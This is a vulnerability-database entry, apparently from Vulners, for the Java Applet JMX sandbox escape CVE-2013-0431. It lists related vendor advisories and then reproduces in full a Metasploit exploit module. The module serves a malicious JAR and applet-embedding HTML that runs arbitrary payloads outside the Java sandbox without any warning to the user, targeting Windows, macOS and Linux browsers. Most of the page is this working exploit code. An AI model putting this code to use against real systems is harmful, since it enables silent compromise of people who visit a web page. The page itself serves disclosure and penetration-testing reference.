Java Applet JMX - Remote Code Execution (Metasploit) (2)

🗓️ 25 Feb 2013 00:00:00Reported by MetasploitType

Java Applet JMX Remote Code Execution. Module abuses JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox. Bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user

Reporter	Title	Published	Views	Family All 95
0day.today	Java Applet JMX Remote Code Execution	25 Feb 201300:00	–	zdt
IBM Security Bulletins	Security Bulletin: Tivoli Storage Productivity Center - Oracle CPU February 2013, April 2013	19 Aug 202218:23	–	ibm
IBM Security Bulletins	Security Bulletin: WebSphere Application Server updates to IBM SDK for Java Feb 2013 CPU	25 Sep 202220:45	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in Rational Application Developer for WebSphere Software due to issues in IBM Java SDK (CVE-2013-0440, CVE-2013-0443, CVE-2013-0169)	5 Feb 202000:09	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE 6.0	25 Sep 202223:13	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Smart Analytics System 5600 is affected by vulnerabilities in the IBM Java SDK	25 Sep 202221:06	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Tivoli System Automation for Integrated Operations Management 2.1.1 Vulnerability: Multiple security vulnerabilities in IBM JREs 6.0 and 7.0	25 Sep 202221:06	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in Rational Developer for System z due to issues in IBM Java SDK (CVE-2013-0440, CVE-2013-0443, CVE-2013-0169)	27 Oct 202015:51	–	ibm
Tenable Nessus	Oracle Java SE 7 <= Update 11 Multiple Vulnerabilities (February 2013 CPU)	6 Feb 201200:00	–	nessus
Tenable Nessus	Amazon Linux AMI : java-1.7.0-openjdk (ALAS-2013-156)	4 Sep 201300:00	–	nessus

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({ :javascript => false })

	def initialize( info = {} )

		super( update_info( info,
			'Name'          => 'Java Applet JMX Remote Code Execution',
			'Description'   => %q{
					This module abuses the JMX classes from a Java Applet to run arbitrary Java code
				outside of the sandbox as exploited in the wild in February of 2013. Additionally,
				this module bypasses default security settings introduced in Java 7 Update 10 to run
				unsigned applet without displaying any warning to the user.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Unknown', # Vulnerability discovery and exploit in the wild
					'Adam Gowdiak', # Vulnerability discovery
					'SecurityObscurity', # Exploit analysis and deobfuscation
					'juan vazquez' # Metasploit module
				],
			'References'    =>
				[
					[ 'CVE', '2013-0431' ],
					[ 'OSVDB', '89613' ],
					[ 'BID', '57726' ],
					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
					[ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
					[ 'URL', 'http://pastebin.com/QWU1rqjf' ],
					[ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
				],
			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
			'Targets'       =>
				[
					[ 'Generic (Java Payload)',
						{
							'Platform' => ['java'],
							'Arch' => ARCH_JAVA,
						}
					],
					[ 'Windows x86 (Native Payload)',
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Mac OS X x86 (Native Payload)',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 19 2013'
		))
	end

	def on_request_uri(cli, request)
		print_status("handling request for #{request.uri}")

		case request.uri
		when /\.jar$/i
			print_status("Sending JAR")
			send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } )
		when /\/$/
			print_status("Sending HTML")
			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
		else
			send_redirect(cli, get_resource() + '/', '')
		end
	end

	def generate_jar
		paths = [
			[ "Exploit.ser" ],
			[ "Exploit.class" ],
			[ "B.class" ]
		]

		p = regenerate_payload(cli)

		jar  = p.encoded_jar

		paths.each do |path|
			1.upto(path.length - 1) do |idx|
				full = path[0,idx].join("/") + "/"
				if !(jar.entries.map{|e|e.name}.include?(full))
					jar.add_file(full, '')
				end
			end
			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
			data = fd.read(fd.stat.size)
			jar.add_file(path.join("/"), data)
			fd.close
		end
		return  jar.pack
	end

	def generate_html
		html = <<-EOF
<html>
<script language="Javascript">

var _app = navigator.appName;

if (_app == 'Microsoft Internet Explorer') {
document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>');
} else {
document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>');
}

</script>
</html>
		EOF
		return html
	end

end

25 Feb 2013 00:00Current

7High risk

Vulners AI Score7

CVSS 25

CVSS 3.15.3

EPSS0.91543

SSVC